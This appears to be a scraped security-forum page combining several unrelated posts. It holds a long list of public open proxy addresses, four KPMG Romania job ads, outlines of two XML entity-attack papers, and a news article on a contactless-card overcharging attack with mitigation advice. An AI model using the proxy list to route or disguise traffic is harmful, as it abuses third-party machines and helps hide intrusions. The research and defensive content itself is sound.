183.208.35.12:8123 183.209.102.9:8123 183.209.107.226:8123 183.209.7.236:8123 183.211.110.131:8123 183.211.116.163:8123 183.211.5.29:8123 183.211.70.92:8123 183.211.72.156:8123 183.212.85.65:8123 183.212.95.68:8123 183.216.174.60:8123 183.216.176.124:8123 183.216.182.103:8123 183.216.189.171:8123 183.216.31.212:8123 183.216.57.48:8123 183.216.62.5:8123 183.217.140.33:8123 183.217.142.171:8123 183.217.189.61:8123 183.217.202.204:8123 183.217.204.233:8123 183.217.206.200:8123 183.217.232.56:8123 183.217.243.156:8123 183.218.103.32:8123 183.218.108.243:8123 183.218.122.95:8123 183.218.67.18:8123 183.218.85.93:8123 183.219.136.247:8123 183.219.137.144:8123 183.219.138.212:8123 183.219.140.46:8123 183.219.149.178:8123 183.219.153.83:8123 183.219.160.162:8123 183.219.2.65:8123 183.219.247.96:8123 183.219.248.70:8123 183.219.249.61:8123 183.219.46.155:8123 183.219.5.241:8123 183.219.50.200:8123 183.219.6.122:8123 183.219.83.67:8123 183.219.85.151:8123 183.219.88.140:8123 183.219.89.69:8123 183.219.90.133:8123 183.219.91.24:8123 183.219.94.67:8123 183.220.194.59:8123 183.220.199.223:8123 183.220.240.15:8123 183.220.240.240:8123 183.220.241.218:8123 183.220.245.2:8123 183.220.246.160:8123 183.220.247.135:8123 183.220.247.243:8123 183.220.44.239:8123 183.220.45.139:8123 183.221.147.193:8123 183.221.160.29:8123 183.221.164.91:8123 183.221.174.192:8123 183.221.175.177:8123 183.221.186.167:8123 183.221.188.161:8123 183.221.191.187:8123 183.221.191.198:8123 183.221.191.240:8123 183.221.208.185:8123 183.222.152.197:8123 183.222.153.242:8123 183.222.154.162:8123 183.222.156.12:8123 183.222.156.51:8123 183.222.157.227:8123 183.222.158.10:8123 183.222.158.150:8123 183.222.159.250:8123 183.222.160.21:8123 183.222.161.78:8123 183.222.163.68:8123 183.222.171.236:8123 183.222.174.137:8123 183.222.176.113:8123 183.222.183.37:8123 183.222.255.144:8123 183.222.87.110:8123 183.222.87.239:8123 183.223.16.2:8123 183.223.171.241:8123 183.223.172.31:8123 183.223.173.175:8123 183.223.35.63:8123 183.224.1.30:80 183.224.12.76:80 183.224.12.81:80 183.227.210.73:8123 183.228.142.252:8123 183.228.142.78:8123 183.228.156.176:8123 183.228.176.207:8123 183.228.176.47:8123 183.228.177.3:8123 183.228.179.113:8123 183.228.180.85:8123 183.228.182.71:8123 183.228.200.133:8123 183.228.201.154:8123 183.228.205.64:8123 183.228.206.3:8123 183.228.209.120:8123 183.228.209.6:8123 183.228.210.248:8123 183.228.222.175:8123 183.228.238.59:8123 183.228.239.134:8123 183.228.239.70:8123 183.228.243.115:8123 183.228.243.147:8123 183.228.249.139:8123 183.228.251.7:8123 183.228.39.228:8123 183.228.39.246:8123 183.228.39.68:8123 183.228.40.4:8123 183.228.41.213:8123 183.228.42.183:8123 183.228.68.178:8123 183.228.78.93:8123 183.228.79.184:8123 183.228.88.130:8123 183.228.88.46:8123 183.230.53.153:8123 183.247.235.21:8123 183.249.23.148:8123 183.249.33.202:8123 183.249.6.133:80 183.57.78.62:8085 183.82.131.183:9064 183.83.108.60:9064 183.83.87.150:9064 183.89.78.116:8080 183.89.92.242:3128 184.105.18.253:8085 186.136.180.233:8080 186.89.130.234:9064 186.89.253.70:8080 186.89.65.213:8080 186.89.90.103:9064 186.90.78.254:9064 186.90.79.190:8080 186.91.95.149:9064 186.92.112.11:8080 186.92.155.55:9064 186.92.163.128:9064 186.92.173.190:9064 186.92.198.65:8080 186.92.199.190:8080 186.92.199.246:8080 186.92.228.141:9064 186.92.4.99:9064 186.92.45.190:8080 186.93.111.198:8080 186.93.153.85:8080 186.93.19.34:9064 186.93.2.196:9064 186.93.203.224:8080 186.93.231.228:8080 186.93.30.229:9064 186.94.127.192:8080 186.94.143.54:8080 186.94.146.142:9064 186.94.190.53:9064 186.94.2.57:8080 186.94.224.8:9064 186.94.225.192:9064 186.94.241.175:9064 186.94.253.225:9064 186.94.34.32:8080 186.94.35.87:9064 186.94.59.50:8080 186.94.64.115:8080 186.95.228.109:8080 186.95.243.202:9064 186.95.47.172:8080 186.95.50.205:9064 186.96.253.146:8080 187.120.34.166:3128 187.120.34.246:3128 187.120.34.25:3128 187.120.34.66:3128 187.72.134.241:3128 187.73.175.23:3128 189.84.176.185:3128 189.85.20.189:8080 190.0.48.2:8080 190.128.238.38:8080 190.153.116.27:8080 190.183.115.148:9064 190.183.177.235:9064 190.184.144.174:8080 190.184.144.78:8080 190.198.134.200:9064 190.198.154.226:8080 190.198.178.228:9064 190.198.180.106:9064 190.198.2.148:8080 190.198.216.80:8080 190.198.227.114:8080 190.198.254.141:8080 190.198.27.169:9064 190.198.27.97:9064 190.198.80.240:8080 190.199.183.246:9064 190.199.218.90:8080 190.199.67.95:8080 190.199.71.123:9064 190.200.155.27:8080 190.200.157.6:8080 190.200.16.228:9064 190.200.185.216:9064 190.200.189.115:9064 190.200.217.151:8080 190.201.142.135:8080 190.201.154.134:9064 190.201.165.152:9064 190.201.167.141:9064 190.201.170.94:9064 190.201.216.72:9064 190.201.40.238:9064 190.202.194.152:9064 190.202.244.165:8080 190.203.132.250:8080 190.203.201.100:8080 190.203.239.67:8080 190.203.43.97:9064 190.204.1.2:9064 190.204.101.28:8080 190.204.122.129:8080 190.204.160.33:8080 190.204.168.253:8080 190.204.173.227:8080 190.204.242.235:8080 190.204.255.232:8080 190.204.26.213:9064 190.204.29.122:9064 190.204.55.110:9064 190.204.67.235:9064 190.205.123.55:8080 190.205.127.253:8080 190.205.192.9:8080 190.205.193.204:9064 190.205.196.77:9064 190.205.202.104:8080 190.205.220.126:8080 190.205.225.226:9064 190.207.149.102:8080 190.207.185.119:8080 190.207.200.185:8080 190.207.203.228:8080 190.207.208.168:9064 190.207.219.164:3128 190.207.228.97:9064 190.207.24.170:8080 190.207.253.107:9064 190.207.34.65:8080 190.207.56.83:9064 190.207.63.222:8080 190.217.215.194:9064 190.36.11.61:9064 190.36.143.123:8080 190.36.152.23:9064 190.36.154.15:8080 190.36.214.44:8080 190.36.72.1:9064 190.36.8.130:9064 190.36.8.26:9064 190.37.122.118:8080 190.37.122.163:8080 190.37.164.82:9064 190.37.165.72:9064 190.37.211.186:9064 190.37.224.236:8080 190.37.225.158:8080 190.37.231.178:8080 190.37.232.155:8080 190.37.239.21:9064 190.37.34.104:8080 190.37.48.121:8080 190.37.57.100:8080 190.37.77.86:8080 190.38.122.59:9064 190.38.123.239:9064 190.38.157.98:9064 190.38.178.28:8080 190.38.218.87:8080 190.38.29.145:9064 190.38.44.178:8080 190.38.45.9:8080 190.38.5.195:8080 190.38.54.32:8080 190.38.64.85:8080 190.38.68.219:8080 190.38.88.204:9064 190.38.94.86:8080 190.38.97.254:9064 190.39.105.142:9064 190.39.107.127:8080 190.39.169.183:9064 190.39.252.172:9064 190.39.67.73:8080 190.39.68.174:8080 190.39.75.247:8080 190.39.94.169:8080 190.40.123.36:8080 190.44.73.74:9064 190.52.32.126:3128 190.72.120.118:9064 190.72.15.242:8080 190.72.15.87:8080 190.72.153.86:8080 190.72.157.20:9064 190.72.191.194:9064 190.72.225.106:8080 190.72.6.206:9064 190.73.105.81:8080 190.73.11.143:8080 190.73.185.34:9064 190.73.216.119:8080 190.73.233.182:8080 190.73.252.90:9064 190.73.96.171:8080 190.74.146.224:8080 190.74.162.46:9064 190.74.165.158:8080 190.74.165.207:9064 190.74.168.149:8080 190.74.180.79:8080 190.74.186.36:9064 190.74.199.171:8080 190.74.200.117:9064 190.74.202.231:9064 190.74.203.4:8080 190.74.90.109:9064 190.75.137.251:9064 190.75.139.217:8080 190.75.139.61:9064 190.75.194.53:8080 190.75.206.79:9064 190.75.211.152:9064 190.75.238.227:9064 190.75.239.216:9064 190.75.33.152:9064 190.75.35.65:8080 190.77.219.159:8080 190.77.221.130:9064 190.77.230.141:8080 190.77.245.52:9064 190.78.151.16:9064 190.78.178.185:9064 190.78.178.6:8080 190.78.23.90:8080 190.78.24.108:9064 190.78.98.178:9064 190.78.99.152:9064 190.79.105.115:8080 190.79.107.130:9064 190.79.151.178:8080 190.79.222.12:9064 190.79.6.136:9064 190.94.202.13:9064 190.94.216.250:9064 190.98.205.107:80 191.105.121.101:9064 191.240.57.212:8080 191.241.76.52:8080 191.37.238.135:8080 191.37.238.169:8080 192.163.255.175:3128 192.3.104.245:80 192.3.162.138:3128 192.99.3.129:3128 194.125.224.125:3128 194.126.140.247:80 194.186.43.22:3128 194.213.60.227:8585 194.247.12.106:3128 194.247.165.118:8080 194.44.153.89:3128 194.8.248.22:3128 195.114.125.81:8080 195.154.77.104:3128 198.251.67.194:8080 198.46.103.108:80 198.52.217.44:7808 198.52.217.44:8089 198.71.193.192:80 198.71.213.94:80 199.167.228.36:80 199.200.120.140:8089 199.200.120.36:7808 199.200.120.37:7808 200.109.137.60:8080 200.112.211.16:8080 200.124.112.24:3128 200.143.198.83:3128 200.174.182.103:8080 200.192.248.94:8080 200.223.4.138:8081 200.242.145.3:3128 200.69.206.157:8080 200.90.86.38:8080 200.93.69.164:9064 201.208.204.219:9064 201.208.30.218:8080 201.208.37.148:8080 201.209.198.47:9064 201.209.220.178:8080 201.209.233.75:9064 201.209.240.8:9064 201.209.31.248:8080 201.209.47.77:9064 201.209.53.85:9064 201.210.222.209:9064 201.210.233.167:8080 201.210.249.226:9064 201.210.69.228:8080 201.211.109.142:8080 201.211.120.56:8080 201.211.129.156:9064 201.22.217.194:8080 201.221.131.62:8080 201.221.131.92:8080 201.221.132.69:3128 201.221.133.182:8080 201.238.203.66:3128 201.240.215.147:3128 201.242.185.129:8080 201.242.80.177:8080 201.242.93.133:9064 201.242.93.177:8080 201.243.104.100:9064 201.243.111.111:9064 201.243.126.125:8080 201.243.16.66:8080 201.243.175.209:9064 201.243.207.40:9064 201.243.96.183:8080 201.243.96.251:8080 201.248.18.112:8080 201.248.9.40:9064 201.55.143.1:3128 202.103.150.70:8088 202.108.50.75:80 202.109.163.75:8085 202.112.114.27:3128 202.117.1.122:8080 202.120.188.104:80 202.133.104.106:80 202.133.104.106:8080 202.141.225.126:8080 202.152.6.10:80 202.152.6.10:8080 202.152.61.44:8080 202.169.225.204:80 202.169.225.204:8080 202.171.253.134:80 202.171.253.135:80 202.171.253.72:80 202.171.253.84:85 202.171.253.84:86 202.29.238.242:3128 202.53.170.134:8080 202.77.115.71:54321 202.78.206.83:8080 202.91.73.30:8080 202.99.172.244:3128 203.128.71.247:8080 203.151.21.184:3128 203.176.136.66:8080 203.195.132.244:3128 203.202.250.98:3128 203.73.233.144:8088 203.81.67.86:8080 207.108.136.68:443 209.150.233.83:80 210.101.131.232:8080 210.13.105.23:8080 210.140.155.65:80 210.186.158.210:9064 210.209.72.236:80 210.245.20.170:80 210.65.10.76:3128 210.70.253.27:3128 210.73.218.136:3128 210.82.92.77:3128 211.138.121.37:80 211.138.121.37:81 211.138.121.37:82 211.138.121.37:83 211.138.121.37:84 211.138.121.38:80 211.138.121.38:81 211.138.121.38:82 211.138.121.38:83 211.138.60.16:80 211.138.60.18:80 211.139.45.22:8123 211.143.146.239:80 211.143.146.239:82 211.143.146.239:83 211.143.146.239:843 211.155.230.38:808 211.166.8.27:80 212.156.157.86:8080 212.158.155.22:8080 212.200.131.83:80 212.200.131.83:8080 216.120.236.190:3128 217.12.215.22:3128 218.108.232.99:80 218.166.101.107:8088 218.173.47.80:9064 218.173.73.10:9064 218.201.21.142:80 218.201.21.145:80 218.201.21.148:80 218.201.21.153:80 218.201.38.49:80 218.203.13.169:80 218.203.13.169:81 218.203.13.169:82 218.203.13.169:83 218.203.13.169:84 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.204.120.37:8123 218.204.156.111:8123 218.204.159.57:8123 218.206.83.89:80 218.207.10.178:8123 218.207.17.163:8123 218.207.172.236:80 218.207.172.237:80 218.207.51.19:8123 218.207.52.55:8123 218.207.55.162:8123 218.26.13.155:63000 218.27.136.169:8085 218.28.96.39:3128 218.29.155.198:9999 218.29.90.30:9999 218.75.205.124:9999 218.75.205.57:9999 219.93.183.106:8080 220.129.173.150:9064 220.136.166.222:9064 220.173.235.202:9999 220.231.32.195:3128 221.0.182.5:808 221.172.143.166:9000 221.176.14.72:80 221.178.119.219:8123 221.178.119.233:8123 221.178.121.198:8123 221.178.124.80:8123 221.178.127.170:8123 221.178.24.55:8123 221.178.28.215:8123 221.178.29.169:8123 221.178.30.200:8123 221.178.30.253:8123 221.178.30.30:8123 221.178.32.109:8123 221.178.53.85:8123 221.178.54.134:8123 221.178.55.55:8123 221.178.78.102:8123 221.178.83.50:8123 221.178.84.49:8123 221.178.86.157:8123 221.178.86.224:8123 221.178.98.82:8123 221.178.99.130:8123 221.180.130.48:80 221.180.130.49:80 221.180.130.50:80 221.180.130.51:80 221.180.147.30:80 221.180.147.30:81 221.180.147.30:83 221.180.147.30:86 221.182.110.141:8123 221.182.62.114:9999 221.182.62.32:8123 221.182.74.154:8123 221.182.74.46:8123 221.182.75.186:8123 221.182.75.205:8123 221.182.75.80:8123 221.183.16.219:80 221.231.135.149:80 221.5.69.51:80 221.5.69.51:8000 222.124.149.178:3128 222.129.205.199:9000 222.132.29.10:8080 222.246.232.55:80 222.35.17.177:8080 222.50.14.100:9000 222.66.97.75:8080 222.85.1.123:8118 222.85.103.192:81 222.85.149.4:3128 222.88.236.236:81 222.88.236.236:82 222.88.236.236:83 222.88.242.213:9999 223.252.33.209:23684 223.66.80.235:8123 223.67.148.169:8123 223.82.14.151:8123 223.82.169.151:8123 223.82.171.161:8123 223.82.171.176:8123 223.82.203.120:8123 223.82.204.182:8123 223.82.217.177:8123 223.82.217.28:8123 223.82.218.166:8123 223.82.37.67:8123 223.82.39.59:8123 223.82.42.148:8123 223.82.67.22:8123 223.82.74.214:8123 223.83.136.97:8123 223.83.137.26:8123 223.83.141.95:8123 223.83.201.241:8123 223.83.206.200:8123 223.84.130.224:8123 223.84.131.211:8123 223.84.133.12:8123 223.84.138.112:8123 223.84.143.179:8123 223.84.145.42:8123 223.84.147.193:8123 223.84.160.160:8123 223.84.19.45:8123 223.84.195.89:8123 223.84.206.174:8123 223.84.206.44:8123 223.84.216.238:8123 223.84.221.130:8123 223.84.229.77:8123 223.84.232.62:8123 223.84.82.206:8123 223.86.122.39:8123 223.86.127.219:8123 223.86.127.27:8123 223.86.127.57:8123 223.86.171.47:8123 223.86.215.67:8123 223.86.216.148:8123 223.86.217.177:8123 223.86.217.37:8123 223.86.218.118:8123 223.86.218.22:8123 223.86.219.193:8123 223.86.223.179:8123 223.86.3.124:8123 223.86.32.6:8123 223.86.40.248:8123 223.86.6.44:8123 223.86.66.238:8123 223.86.67.105:8123 223.86.67.61:8123 223.86.7.110:8123 223.86.7.221:8123 223.86.7.51:8123 223.86.7.63:8123 223.86.72.148:8123 223.86.9.83:8123 223.87.108.106:8123 223.87.114.209:8123 223.87.159.77:8123 223.87.183.43:8123 223.87.62.203:8123 223.87.76.128:8123 223.99.188.73:8090 223.99.188.74:8090 23.226.131.196:8080 23.232.196.1:80 23.232.196.10:80 23.232.196.13:80 23.232.196.14:80 23.232.196.2:80 23.232.196.4:80 27.109.140.205:80 27.115.18.18:8080 27.131.190.66:8080 27.131.47.131:8080 27.145.145.105:8080 27.187.155.71:8088 27.3.142.237:9064 27.5.192.190:9064 27.50.128.242:88 31.15.48.12:80 31.3.246.183:7080 31.7.232.102:3128 36.224.219.91:8088 36.226.118.20:9064 36.227.225.141:8088 36.227.4.45:8088 36.231.127.68:8088 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.73.141.145:31281 36.74.37.6:8888 36.78.128.251:31281 36.80.35.69:8080 37.131.208.141:8080 37.157.192.146:3128 37.236.167.250:80 37.239.46.10:80 37.239.46.18:80 37.239.46.50:80 37.239.46.58:80 37.60.66.108:8080 37.60.66.109:8080 41.188.49.163:3128 41.73.230.39:8080 41.89.96.36:3128 42.117.3.73:3128 42.202.146.58:8080 42.62.61.245:80 46.32.231.84:80 49.113.241.95:8585 49.204.134.166:9064 49.204.176.99:9064 49.207.213.194:9064 49.207.217.125:9064 49.207.227.208:9064 49.207.29.74:9064 5.102.108.198:80 5.135.98.240:80 5.153.230.44:80 5.196.5.145:3128 58.146.102.176:9064 58.248.156.53:9999 58.248.156.54:9999 58.248.80.61:9999 58.248.81.11:9999 58.251.78.71:8088 58.252.0.25:9999 58.253.238.242:80 58.253.238.243:80 58.42.236.241:80 58.64.130.14:8080 58.64.130.18:8080 58.96.168.83:9999 59.115.10.115:9064 59.12.160.20:3128 59.151.103.14:80 59.151.103.15:80 59.188.252.249:3128 59.46.72.245:8080 60.12.11.60:808 60.12.69.110:80 60.190.138.151:80 60.207.166.152:80 60.21.132.218:63000 60.213.189.170:3988 60.214.67.86:9999 60.221.253.204:80 60.55.43.74:80 61.133.51.6:9999 61.149.182.102:8080 61.155.169.11:808 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.172.44.138:9999 61.19.114.178:8080 61.19.121.121:3128 61.19.121.154:3128 61.19.30.198:8080 61.19.42.244:8080 61.19.69.252:8080 61.219.16.16:8888 61.223.145.222:9064 61.227.218.171:3128 61.228.146.138:8088 61.228.233.132:9064 61.230.107.88:8088 61.230.21.131:8088 61.234.123.64:8080 61.58.84.209:8088 62.103.107.9:80 62.108.122.173:3128 64.31.22.131:7808 64.31.22.131:8089 64.74.219.86:80 65.49.14.147:3080 65.49.14.147:3128 66.10.94.36:80 66.10.94.36:8080 66.135.118.156:80 66.162.208.10:3128 66.192.33.78:3128 66.192.33.78:8080 67.148.11.168:443 74.253.21.252:8080 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.133.69.131:8080 76.76.105.124:3128 78.107.199.67:8080 79.106.108.139:8080 80.82.69.72:3128 83.246.129.250:3128 88.156.27.199:8080 88.198.24.108:3128 89.191.131.243:8080 89.232.139.253:80 89.249.207.65:3128 89.46.101.122:7808 89.46.101.122:8089 91.218.230.152:3128 91.227.93.20:80 91.238.29.192:9999 93.115.8.229:7808 93.115.8.229:8089 93.188.166.85:80 93.85.92.109:3128 93.87.74.182:8080 94.180.115.232:80 94.198.38.20:8080 94.247.174.117:18080 95.167.39.34:8080 95.65.22.132:3128 95.86.133.141:3128 98.103.146.102:80 [/LIST] Sursa: 08-11-14 | Fast Proxy Server List (1655) - Pastebin.com

Firma: KPMG - In echipa cu mine. IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An IT Security Consultant (Penetration Tester/ Ethical Hacker) for our IT Advisory team. Job profile: • Conduct technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits; • Identify and exploit technical vulnerabilities in clients’ systems, assess business risks of the technical vulnerabilities and communicate to client personnel; • Perform security configuration analysis for various operating systems, especially Windows and Linux / UNIX; • This is a position in the Penetration Testers Team which requires quick learning and working with new technologies, tools and techniques. Some typical projects that you will work on (depending on your expertise) are: • Web application penetration testing: try to find vulnerabilities in web applications (ex. Internet Banking, eCommerce websites, web portals, etc) and report them to the clients. Try to exploit these vulnerabilities in order to prove their business impact. • Internal network penetration testing: simulate a malicious person who already has access to the internal network of the customer (ex. visitor, consultant, etc). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags. • Mobile application penetration testing: try to find vulnerabilities in mobile applications (Android, iOS, Windows phone) and suggest corrective measures in order to improve their security. • Other types of technical projects that will involve your imagination and out-of-the-box thinking may also occur. • It is sometimes required to make demonstrations and presentations to clients. • We encourage technical research and presenting our results to hacking conferences - local and international. Specific requirements: • Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. • In order to understand the technical level that we need, here are a few terms/concepts that we expect you to be familiar with: OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. • You also must be able to express your findings in very good technical and business English (oral and written). • Other desired requirements are: - Bachelor’s degree in an IT related field; - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development; - Work effectively either individually or as a member of a multi-skilled team; - Professional discipline, accuracy, reliability and excellent analytic skills; - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation. Will be considered a plus Certifications such as: OSCP, OSCE, CEH, LPT, CCNA, MCSE. Nota: Va pot oferi orice fel de informatie (non-confidentiala). PM daca sunteti interesati. Bestjobs: IT Security Consultant la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An Application Developer for our IT Advisory team. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio - the development environment and Microsoft SQL Server - the data storage engine. Responsibilities: • Building new systems with ASP.MVC , ASP.NET , SQL Server 2008/ 2012 , Entity Framework and Linq; • Developing new functionality on our existing software products; • Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations; • Participating in a small, experienced, energetic development team. Requirements: • Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience; • Web development experience (ASP.MVC ,ASP.NET, Java script, AJAX, CSS, JSON, JQUERY) - minimum 4 years of experience; • Very good knowledge of T-SQL and relational database design - minimum 4 years of experience; • Graduate of Computer Science/Cybernetics/Information Technology/Electronics College; • Fluent in English; • Ability and willingness to work as part of a team of developers; • Learning oriented person. Additional advantage: • Active Reports, SQL Reporting Services; • Java & Install Shield knowledge; • Active Directory knowledge; • Knowledge of WCF Web Services, WCF Data Services. Nota: Va pot oferi mai multe informatii. PM daca sunteti interesati. Bestjobs: Application Developer la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easy with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess a very good time management and task follow-up skills. Moreover, should demonstrate rigor in his daily routine while treating all staff requirements with solicitude. Job objective The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems and determine source, and advice on appropriate action. Responsibilities: • Respond to requests for technical assistance in person, via phone, and email; • To assist end-users in all IT applications and equipment related issues; • Diagnose, resolve, document resolutions for future reference technical hardware and software issues; • Determine source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action; • Serve as liaison between staff and the IT department to resolve issues; • Perform hardware and software installations; • Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates; • To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items /equipment; • To take part in the implementation of new IT applications and/or management information systems; • To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance; • To provide full end-user support in using customized specific IT applications; • To deliver on the spot and / or regular IT assistance to staff. Required skills: • University degree in Information Technology or related sciences; • At least 2 years prior work experience as a member of a IT team; • Relevant work experience in hardware, software & communication troubleshooting; • Knowledge of Windows 7/8, Office Application - Microsoft certification desirable; Performance standard requirements: Core Competencies defined for Infrastructure staff (link) Nota: Va pot oferi mai multe informatii. PM cine e interesat. Bestjobs: IT Service Desk la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) Candidate profile: Participate to IT advisory projects together with other team members; Assist the in-charge and the manager during the fieldwork and project documentation; Perform various project related tasks in accordance with the instructions of the in-charge and the manager; Document the information in dedicated working papers as per KPMG methodology; Assume indicated roles in projects according to your position; Liaise with the clients to understand, obtain and assess specific information. Specific requirements: Bachelor degree in Economics, Information Systems Management, Cybernetics, Information Technology or related; Information Technology knowledgeable and passionate; Ability to communicate accurately and efficiently in English, both verbally and in writing; Flexible in working independently or in a team, as required by tasks assigned; Ability to understand and meet deadlines and to perform work under pressure; Previous experience in a consulting company would be a plus; Available for business travel; Drive for developing professionally and building long term relationships with clients and colleagues. Nota: Va pot oferi mai multe informatii. PM daca e cineva interesat. Bestjobs: IT ADVISORY JUNIOR/ INTERN la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

XML Schema, DTD, and Entity Attacks May 19, 2014 Version 1.0 Timothy D. Morgan (@ecbftw) Omar Al Ibrahim (oalibrahim@vsecurity.com) Contents Abstract...............................................................................................................................................................................3 Introduction........................................................................................................................................................................4 Motivation............................................................................................................................................................................................................. 4 Background........................................................................................................................................................................................................... 4 Prior Art................................................................................................................................................................................................................ 5 General Techniques...........................................................................................................................................................6 Resource Inclusion via External Entities........................................................................................................................................................ 6 URL Invocation.................................................................................................................................................................................................... 7 Parameter Entities.............................................................................................................................................................................................. 9 External Resource Inclusion via XInclude Support................................................................................................................................... 12 Denial of Service Attacks................................................................................................................................................................................ 13 Implementation-Specific Techniques and Limitations.............................................................................................15 Java / Xerces...................................................................................................................................................................................................... 15 C# / .NET........................................................................................................................................................................................................... 19 Expat.................................................................................................................................................................................................................... 24 Libxml2................................................................................................................................................................................................................ 25 PHP...................................................................................................................................................................................................................... 26 Python................................................................................................................................................................................................................. 28 Ruby..................................................................................................................................................................................................................... 28 Recommendations For Developers............................................................................................................................29 Java / Xerces...................................................................................................................................................................................................... 29 C# / .NET........................................................................................................................................................................................................... 30 Expat.................................................................................................................................................................................................................... 32 Libxml2................................................................................................................................................................................................................ 32 PHP...................................................................................................................................................................................................................... 32 Python................................................................................................................................................................................................................. 32 Ruby..................................................................................................................................................................................................................... 33 Recommendations For XML Library Implementors..............................................................................................33 Future Work.....................................................................................................................................................................34 Acknowledgements........................................................................................................................................................34 References........................................................................................................................................................................35 Download:http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

CONTENT Introduction It's all about entities Parameter entities Validity and well-formedness XXE Data Retrieval Peculiar features of attacks on various parsers References About Positive Technologies Download: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf

How To Steal $999,999.99 From Visa Contactless Cards Without PIN. Posted on November 6, 2014 by Waqas Findings from the newly submitted research paper at Newcastle University will shock many of the people using VISA contactless payment system. Amazing aspect of the research is that it doesn’t involve any kind of hack, it’s just a trick that can force contactless payment owners to pay much more than they were willing to spend. Such an attack is a special type of Man in the Middle (MitM) attack. So, fasten your seat belts and get ready because something quite astonishing is about to be unraveled! Let’s first look at how contactless bank payment system work. Contactless bank payment (relies on near field communication technology) allows it’s users to pay on the wavier of the card at the payment terminal (card must be within 5cm of the terminal to work). The system is widely used at a number of places (London’s Oyster and Sydney’s Opal are the examples) to charge the users instantaneously. When a user waivers the card through electromagnetic field, an antenna inside the card produces a small current and this wakes up the chip inside the card which reads the data, makes the calculations and provides the reply. Now you must be wondering what’s wrong with the system. Really, there is a massive loop hole in the system let me unravel it. Consider a rigged payment terminal put into place and it detects your card for payment. Though, for only small transactions (less than $20) no pin is required but serious cash can be made if machine can trick through large number of cards each day. It’s like a magnetic field that is always looking to attract different types of materials. Researchers when researched deep into this problem, they found number of concerns over the usage of cards and the related policies: 1. When using VISA cards for foreign payments, the restriction of entering PIN for payments over 20 pounds is omitted. 2. When paying in foreign currency, the official restriction in term of local currency for the payment is omitted. And the card can be charged amount as large as 8-figures. So, if you are in UK your card can be charged up to US$999,999.99 (Not a bad deal for an ordinary thieve J) 3. When paying offline over 100 pounds in foreign currency, security for the payment is reduced and the card is made committed for the transaction without even involving the bank. Though, researchers are not yet sure if transactions exceeding the available balance are allowed or not but once the transaction is made offline the thieve can easily create fake document to claim money or show the money belongs to him and the real owner only gets updates once the transaction is processed. Another concern that is not related to the usage of cards but the terminals: 1 Terminals can even work as spying tool, as many people use these NFC terminals to have the information to their smartphones offline and if rigged these terminal can easily gather information from the people’s smartphones. So, what should be done to stop this from becoming a reality? Well, the researchers have listed some important tips for the contactless payment system and the developers. Tip for the developers: 1. Always require a PIN for foreign currencies. 2. Always require online transaction verification for foreign currencies. Tips for Technology users: 1 If you don’t travel overseas regularly, ask your bank if it offers an option to prevent transactions in foreign currencies. 2. Keep your card in a wallet or cover that blocks electromagnetic radiation so it has to be taken out to be used. 3. Do your low value payments with cash, so you don’t need contactless transactions enabled on your card at all. Sursa: http://hackread.com/how-to-steal-million-from-visa-contactless-cards/

